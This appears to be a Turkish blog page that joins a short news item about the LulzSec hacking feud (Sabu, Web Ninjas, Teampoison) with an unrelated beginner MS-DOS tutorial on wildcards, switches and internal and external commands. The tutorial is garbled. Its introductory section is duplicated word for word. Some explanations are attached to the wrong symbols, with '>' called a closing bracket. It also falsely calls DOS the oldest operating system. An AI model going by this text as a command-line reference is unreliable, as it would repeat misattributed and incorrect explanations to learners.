LulzSec, yine de tutuklamaya tepki göstermek adına, kendilerine ihanet eden iki Hacker’ın kimliklerini açığa çıkardı. LulzSec’in elebaşı olan ve Twitter’da konuşan Sabu, bu kişilerin 19 yaşındaki gencin tutuklamasında önemli bir rol oynadıkları söyledi.
Öte yandan Web Ninjas adlı bir grup da geçen gün LulzSec’e savaş açtı. Yaptığı duyuruda LulzSec üyelerini parmaklıkların arasına göndermek için elinden gelen her şeyi yapacaklarını söylediler.
Bu duyuru çok geçmeden Teampoison da LulzSec’e meydan okudu ve ilk tepki olarak LulzSec üyesi olan Joepei’in web sitesini ele geçirdi.
Teampoison ve Sabu, Twitter'da birbirilerine sürekli laf atıyorlar. En büyük Hacker’in kim olduğunu ispatlamak için farklı hedefler seçiyorlar. Hatta bazen rakiplerin sitelerini de elde etmek için uğraşıyorlar. Dolaysıyla bu dönemde konu ile ilgisi olmayan ama ilgi çekileceği düşünülen yeni hedeflerin olması muhtemel.
Ms Dos'ta Kullanılan Bazı İşaretler
\ Klasör Altında.
Bir klasör veya dosyanın bir klasör veya sürücünün altında olduğunu belirten işaret ters bölüm ( \ ) karakteridir.* Bir yazının yerini tutar.
Birden çok dosya veya klasörlerle işlem yapılması gerektiğinde, her madde için tek tek komut kullanılması yerine, ortak özellikler belirtilir ve yıldız ( * ) karakterinin kullanılır.*.txt Bütün .txt uzantılı dosyalar.
A*.* A ile başlayan tüm dosya veya dizinler.
A*B.doc A'yla başlayan B'yle biten doc uzantılı dosyalar.
>, kapatma amaçlı bir ayraçtır.
Dizinler arasında dolaşırken Dizinleri ayrımada kullanılır.? Bir harfin yerini tutar.
Tıpkı yıldız karakteri gibi soru işareti ( ? ) de 'joker' olarak kullanılabilir. Ancak bu işaret sadece bir karakterin yerini tutar .A?B.txt Başı A sonu B olan üç harfli txt uzantılı dosyalar.
A??B.txt Başı A sonu B olan Dört harfli txt uzantılı dosyalar.
/ Komutla Seçenek Kullan
Herhangi bir komuta seçenek girmek için ( / ) karakteri ( slaş ) kullanılır. Bu karakterin ardından herhangi bir anahtar ( genellikle belli bir işlemi veya tercihi simgeleyen ) bir harf girilir. Birden fazla seçenek (birbirleriyle çelişmedikleri durumunda) artarda girilebilir.Komut Parametreler /Seçenek
. Dosya İsim Uzantı Ayırıcı
Bir dosya ismiyle uzantısını ayırmak için ( . ) karakteri ( nokta ) kullanılır.Ms Dos'a Başlangıç
Ms Dos Nedir?
Disk işlemleri,bellek işlemleri gibi programların çalışabilmesi için gerekli düzenlemeleri yapan işletim sistemidir. DOS un tarihi PC lerin tarihiyle başlar. En eski işletim sistemidir. Dos'ta grafiksel arabirim yoktur. Bu yüzden windows ve benzeri işletim sistemleri dos'un yerini almıştır. Dos'ta bütün işlemler komutlar yardımı ile yapılır. Ancak her ne kadar da günümüzde dos kullanılmasa da bir gün dosa ihtiyacımız düşebilir. Bazı durumlarda bilgisayarımız windowstan açılmayabilir. Bu durumlarda dos yardımımıza yetişerek bize yardımcı olur. Günümüzde MS-DOS işletim sisteminde çalışan program ve oyunlar vardır.
MS-DOS işletim sisteminde komutlar ikiye ayrılır.
1- İç komutlar: Çalışması için her hangi bir program dosyasına ihtiyacı olmayan komutlar.(DIR ,COPY,DATE, DEL, TIME,REN,PROMPT, TYPE, MD)
2- Dış komutlar: Çalışması için program dosyası yani o komutun program dosyasına ihtiyaç duyan komutlar.(FORMAT, MEM, CHKDSK, XCOPY, LABEL, DOSKEY, ATTRIB, PRINT, BACKUP, EDIT, RESTORE, DELTREE)
MS-DOS İşletim Sistemini Çalıştırmak
1- Windows ortamında, Başlat menüsünden çalıştır seçeneğini seçerek karşımıza çıkan menüde COMMAND yazıp onaylarsak Windows altında MS-DOS işletim sistemini çalıştırabiliriz.
2- Windows ortamında değil de sadece Dos ortamında çalışmak istiyorsak, bilgisayar açılırken F8 tuşuna basarak karşımıza çıkan Windows başlangıç menüsünden Sadece Komut istemi seçilir. Bu seçenek MS-DOS işletim sistemini Windows ortamında olmadan çalıştırır.
MS-DOS İşletim Sisteminden Çıkmak
C:\>EXIT
Disk işlemleri,bellek işlemleri gibi programların çalışabilmesi için gerekli düzenlemeleri yapan işletim sistemidir. DOS un tarihi PC lerin tarihiyle başlar. En eski işletim sistemidir. Dos'ta grafiksel arabirim yoktur. Bu yüzden windows ve benzeri işletim sistemleri dos'un yerini almıştır. Dos'ta bütün işlemler komutlar yardımı ile yapılır. Ancak her ne kadar da günümüzde dos kullanılmasa da bir gün dosa ihtiyacımız düşebilir. Bazı durumlarda bilgisayarımız windowstan açılmayabilir. Bu durumlarda dos yardımımıza yetişerek bize yardımcı olur. Günümüzde MS-DOS işletim sisteminde çalışan program ve oyunlar vardır.
MS-DOS işletim sisteminde komutlar ikiye ayrılır.
1- İç komutlar: Çalışması için her hangi bir program dosyasına ihtiyacı olmayan komutlar.(DIR ,COPY,DATE, DEL, TIME,REN,PROMPT, TYPE, MD)
2- Dış komutlar: Çalışması için program dosyası yani o komutun program dosyasına ihtiyaç duyan komutlar.(FORMAT, MEM, CHKDSK, XCOPY, LABEL, DOSKEY, ATTRIB, PRINT, BACKUP, EDIT, RESTORE, DELTREE)
MS-DOS İşletim Sistemini Çalıştırmak
1- Windows ortamında, Başlat menüsünden çalıştır seçeneğini seçerek karşımıza çıkan menüde COMMAND yazıp onaylarsak Windows altında MS-DOS işletim sistemini çalıştırabiliriz.
2- Windows ortamında değil de sadece Dos ortamında çalışmak istiyorsak, bilgisayar açılırken F8 tuşuna basarak karşımıza çıkan Windows başlangıç menüsünden Sadece Komut istemi seçilir. Bu seçenek MS-DOS işletim sistemini Windows ortamında olmadan çalıştırır.
MS-DOS İşletim Sisteminden Çıkmak
C:\>EXIT
Kaydol:
Kayıtlar (Atom)